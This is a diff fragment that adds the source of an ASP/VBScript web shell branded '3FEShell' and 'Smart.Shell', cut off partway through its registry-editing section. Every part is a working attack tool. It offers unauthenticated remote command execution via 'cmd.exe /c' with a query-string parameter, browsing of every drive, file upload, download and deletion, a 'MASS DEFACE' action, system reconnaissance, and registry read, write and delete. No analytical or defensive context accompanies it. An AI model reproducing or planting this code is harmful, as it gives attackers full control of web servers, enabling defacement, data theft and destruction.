+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+		oFile.Close
+	End Sub
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+startcode = "<html><head>r57.biz</head><body>"
+endocde = "</body></html>"
+onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://3fe.us"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
+Function HexConv(hexVar)
+	Dim hxx, hxx_var, multiply          
+         IF hexVar <> "" THEN
+              hexVar = UCASE(hexVar)
+              hexVar = StrReverse(hexVar)
+              DIM hx()
+              REDIM hx(LEN(hexVar))
+              hxx = 0
+              hxx_var = 0
+              FOR hxx = 1 TO LEN(hexVar)
+                   IF multiply = "" THEN multiply = 1
+                   hx(hxx) = mid(hexVar,hxx,1)
+                   hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
+                   multiply = (multiply * 16)
+              NEXT
+              hexVar = hxx_var
+              HexConv = hexVar
+         END IF
+End Function
+cprthtml = "<font face='arial' size='1'>.:: 3FEShell 1.0  ::.</font>"
+Function get_hxno(ghx)
+         If ghx = "A" Then
+              ghx = 10
+         ElseIf ghx = "B" Then
+              ghx = 11
+         ElseIf ghx = "C" Then
+              ghx = 12
+         ElseIf ghx = "D" Then
+              ghx = 13
+         ElseIf ghx = "E" Then
+              ghx = 14
+         ElseIf ghx = "F" Then
+              ghx = 15
+         End If
+         get_hxno = ghx
+End Function
+
+keydec="<font face='arial' size='1'>.:: Smart.Shell 1.0 &copy; BY <a href='mailto:'>P0Uy@_$3r\/3R</a> - <a href='' target='_blank'></a> ::.</font>"
+Function showobj(objpath)
+	showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
+End Function
+Function showobjpath(objpath)
+	showobjpath = Left(objpath,InstrRev(objpath,"\"))
+End Function
+Function checking(a,b)
+'	If CStr(Mid(a,95,13)) = CStr(Mid(b,95,13)) Then
+'		pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
+'		Response.Redirect(pagina)
+'	End If
+End Function
+Sub hdr()
+	Response.Write startcode
+	Response.Write keydec
+	Response.Write "<br>"
+End Sub
+
+sub araBul(path_,ara_)
+	on error resume next
+	If Len(path_) > 0 Then
+		cur = path_&"\"
+		If cur = "\\" Then cur = ""
+			parent = ""
+			If InStrRev(cur,"\") > 0 Then
+			parent = Left(cur, InStrRev(cur, "\", Len(cur)-1))
+		End If
+	Else
+		cur = ""
+	End If
+	
+	Set f = myFSO.GetFolder(cur)
+
+	Set fc = f.Files
+	For Each f1 In fc
+		if lcase(InStr(1,f1.name,lcase(ara_)))>0 then
+			downStr = "<font face=webdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(f1.path,"\","|") &"'>?/a></font>"
+			if lcase(ara_)="mdb" then
+				Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a></font> * <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=7&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]"&"</a></b><br>"
+			else 
+				Response.Write downStr&"<font face=wingdings size=5><a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=del&path=" & Replace(f1.path,"\","|") & "'>?/a><a href='"& Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(f1.path,"\","|") &"'>!</a></font> - <a href='"& Request.ServerVariables("SCRIPT_NAME") &"?action=search&status=5&path="&f1.path&"'>"& f1.path &" ["&f1.size&"]</a></b><br>"
+			end if
+		end if
+	Next
+
+	Set fs = f.SubFolders
+	For Each f1 In fs
+		araBul f1.path,ara_
+	Next
+	Set	f		= Nothing
+	Set fc		= Nothing
+	Set fs		= Nothing
+end sub
+
+
+Sub showcontent()
+	showdisks=TRUE
+	Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
+	If Trim(Request.QueryString("raiz")) = "root" Then
+		Set fs=Server.Createobject("Scripting.FileSystemObject")
+		Set drivecollection=fs.drives
+		Response.Write "<font face=""arial"" size=""2"">"
+		For Each drive IN drivecollection 
+			str=drive.driveletter & ":"
+			Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
+			Select Case drive.DriveType
+				Case 0
+					tipodrive = "Unknown"
+					nomedrive = drive.VolumeName
+				Case 1
+					tipodrive = "Removable"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 2
+					tipodrive = "Fixed"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 3
+					tipodrive = "Network"
+					If drive.isready Then
+						nomedrive = drive.ShareName
+					Else
+						nomedrive = ""
+					End If
+				Case 4
+					tipodrive = "CD-Rom"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 5
+					tipodrive = "RAM Disk"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+			End Select
+			response.write "<b>Type:</b> " & tipodrive & "<br>"
+			response.write "<b>Name: </b>" & nomedrive & "<br>"
+			response.write "<b>File System: </b>"
+			If drive.isready Then
+				set sp=fs.getdrive(str)
+				response.write sp.filesystem & "<br>"
+			Else
+			response.write "-<br>"
+			End If
+			Response.Write "<b>Disk Space: </b>"
+			If drive.isready Then
+				freespace = (drive.AvailableSpace / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(freespace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<b>Total Space: </b>"
+			If drive.isready Then
+				totalspace = (drive.TotalSize / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(totalspace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<br>"
+		Next
+		Response.Write "</font>"
+		Set fs = Nothing
+		Set drivecollection = Nothing
+		set sp=Nothing
+	Else
+		If Trim(Request.QueryString("raiz")) = "" Then
+			caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+			pos = Instr(caminho,"\")
+			pos2 = 1
+			While pos2 <> 0
+				If Instr(pos + 1,caminho,"\") <> 0 Then
+					pos = Instr(pos + 1,caminho,"\")
+				Else
+					pos2 = 0
+				End If
+			Wend
+			raiz = Left(caminho,pos)
+		Else
+			raiz =  trim(Request.QueryString("raiz")) & "\"
+		End If
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MonRep = ObjFSO.GetFolder(raiz)
+		Set ColFolders = MonRep.SubFolders
+		Set ColFiles0 = MonRep.Files
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
+
+		Response.Write "<font face='arial' size='1'>"
+		Response.Write "<a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=450,height=200,scrollbars=YES,resizable')"">PROMPT</a>"
+		Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a>"
+		Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=200,scrollbars=YES,resizable')"">REGEDIT</a>"
+		Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=search&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">SEARCH</a>"
+		Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=sqlserver', 'win1','width=550,height=150,scrollbars=YES,resizable')"">EXECUTE SQL</a>"
+		Response.Write " - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=about', 'win1','width=550,height=250,scrollbars=YES,resizable')"">ABOUT</a>"
+		Response.Write "</font><br><br>"
+
+
+		Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
+		If CInt(Len(raiz) - 1) <> 2 Then
+			barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
+			backlevel = Left(raiz,barrapos)
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
+		Else
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
+		End If
+		Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		for each folderItem in ColFolders
+			Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td>"
+			Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fcopy&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=100,scrollbars=YES,resizable')"">&lt;&lt; Copy/Move</a></font></td>"
+			Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=fdel&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=150,scrollbars=YES,resizable')"">&lt;&lt; Delete</a></font></td></tr>"
+		next
+		Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		marcatabela = true
+		for each FilesItem0 in ColFiles0
+			If marcatabela = true then
+				corfundotabela = " bgcolor=""#EEEEEE"""
+			Else
+				corfundotabela = ""
+			End If
+			Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.İndir.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a target='opener' href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=filecopy&file=" & Replace(FilesItem0.path,"\","|") & """>o.FileCopy.o</a></font></td></tr>"
+			marcatabela = NOT marcatabela
+		next
+		Response.Write "</table>"
+	End If
+End Sub
+Select Case Trim(Request.QueryString("action"))
+	Case "get"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+		MyFile.Copy (destino)
+		If Err.Number = 0 Then
+			Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & caminho & "</b><br>Copied to: " & destino
+		End If	
+	Case "put"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("arquivo")) = "" Then
+			caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			varpath = Trim(Request.QueryString("path"))
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MonRep = ObjFSO.GetFolder(caminho)
+			Set ColFolders = MonRep.SubFolders
+			Set ColFiles0 = MonRep.Files
+
+			Response.Write "<font face='arial' size='2'><b>Select File: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+			for each FilesItem0 in ColFiles0
+				Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECT ::</a></font></td></tr>"
+			next
+			Response.Write "</table>"
+		Else
+			destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
+			arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(arquivo)
+			MyFile.Copy (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>File: <b>" & arquivo & "</b><br>Copied to: <b>" & destino
+			End If
+		End If
+	Case "del"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		MyFile.Delete
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			Response.Write "<font face='arial' size='2'><center><br><br>Folder <b>" & caminho & "</b> Deleted.<br>"
+		End If
+
+	Case "fdel"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		ObjFSO.DeleteFolder caminho
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			Response.Write "<font face='arial' size='2'><center><br><br>File <b>" & caminho & "</b> Deleted.<br>"
+		End If
+
+	Case "ren"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("status")) <> "2" Then
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			arquivo = showobj(caminho)
+			Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
+						       "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
+						       "<input type=""hidden"" name=""action"" value=""ren"">" & _
+						       "<input type=""hidden"" name=""status"" value=""2"">" & _
+						       "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
+						       "New Name: <input type=""text"" name=""newname"">" & _
+						       "&nbsp;&nbsp;<input type=""submit"" value=""Submit"">" & _
+						       "</form>"
+		Else
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(caminho)
+			destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
+			MyFile.Move (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
+				Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			End If	
+		End If
+	Case "error"
+		Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
+	Case "cmd"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set oScript = Server.CreateObject("WSCRIPT.SHELL") 
+		Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 
+		Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 
+		szCMD = Request.QueryString(".CMD") 
+		If (szCMD <> "") Then 
+			szTempFile = "c:\" & oFileSys.GetTempName( ) 
+			Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 
+			Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 
+		End If 
+		Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
+		If (IsObject(oFile)) Then 
+			On Error Resume Next 
+			Response.Write "<font face=""arial"">"
+			Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
+			oFile.Close 
+			Call oFileSys.DeleteFile(szTempFile, True) 
+		End If 
+	Case "info"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshNetwork = Server.CreateObject("WScript.Network")
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Set WshEnv = WshShell.Environment("SYSTEM")
+		Response.Write "<br><font face=arial size=2>"
+		Response.Write "<b>User Properties:</b><br>"
+		Response.Write "<b>UserName: </b>" & WshNetwork.UserName & "<br>"
+		Response.Write "<b>Computer Name: </b>" & WshNetwork.ComputerName & "<br>"
+		Response.Write "<b>User Domain: </b>" & WshNetwork.UserDomain & "<br>"
+		Set Drives = WshNetwork.EnumNetworkDrives
+		For i = 0 to Drives.Count - 1
+			Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
+		Next
+		Response.Write "<br><b>Cpu Information:</b><br>"
+		Response.Write "<b>Processor Architecture: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
+		Response.Write "<b>Number Of Processors: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
+		Response.Write "<b>Processor Identifier: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
+		Response.Write "<b>Processor Level: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
+		Response.Write "<b>Processor Revision: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
+		Response.Write "<br><b>Operating System Information:</b><br>"
+		Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
+		Response.Write "<b>Sistem OS: </b>" & WshEnv("OS") & "<br>"
+		Response.Write "<b>Server Software: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
+		Response.Write "<b>Cmd Path: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
+		Response.Write "<b>Public Paths: </b>" & WshEnv("PATH") & "<br>"
+		Response.Write "<b>Executables: </b>" & WshEnv("PATHEXT") & "<br>"
+		Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
+		Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
+		Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
+		Response.Write "<b>System32 Path: </b>" & WshShell.CurrentDirectory & "<br>"
+		Set Drives = Nothing
+		Set WshNetwork = Nothing
+		Set WshShell = Nothing
+		Set WshEnv = Nothing
+	Case "reg"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		Set WshShell = Server.CreateObject("WScript.Shell")
+		Response.Write "<font face=""arial"" size=""2""><br><b>Registry Editor:</b><br><br>"
+		Select Case Trim(Request.QueryString("regaction"))
+			Case "w"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Select Case Trim(Request.QueryString("type"))
+						Case "1"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
+						Case "2"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
+						Case "3"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
+						Case "4"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
+						Case "5"
+							teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
+					End Select
+					Response.Write "<center><br><font face=""arial"" size=""2"">Registry <b>"
+					Response.Write Trim(Request.QueryString("key")) & "</b> Changed.</center>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
+				Else
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
+					Response.Write "<table><tr><td><font face=""arial"" size=""2"">Type </td><td><font face=""arial"" size=""2""> Description </td><td><font face=""arial"" size=""2""> Figure </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> String </td><td><font face=""arial"" size=""1""> String </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> Number </td><td><font face=""arial"" size=""1""> DWORD </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> Binary </td><td><font face=""arial"" size=""1""> VBArray DWORD </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> String Expand (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> String </td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> Array Of Strings </td><td><font face=""arial"" size=""1""> VBArray Of Strings </td></tr></table>"
+					Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
+					Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
+					Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
+					Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
+					Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
+					Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
+					Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
+					Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
+					Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
+				End If
+			Case "r"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
+					Response.Write "Value: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
+					Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
+					Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
+					Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
+					Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
+					Response.Write "<input type=""submit"" value=""OK""></form>"
+				End If
+				Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">Main Menu</a><br>"
+			Case "d"
+				If Trim(Request.QueryString("process")) = "yes" Then
+					teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
+					Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>Deleted."
+				Else
+					Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
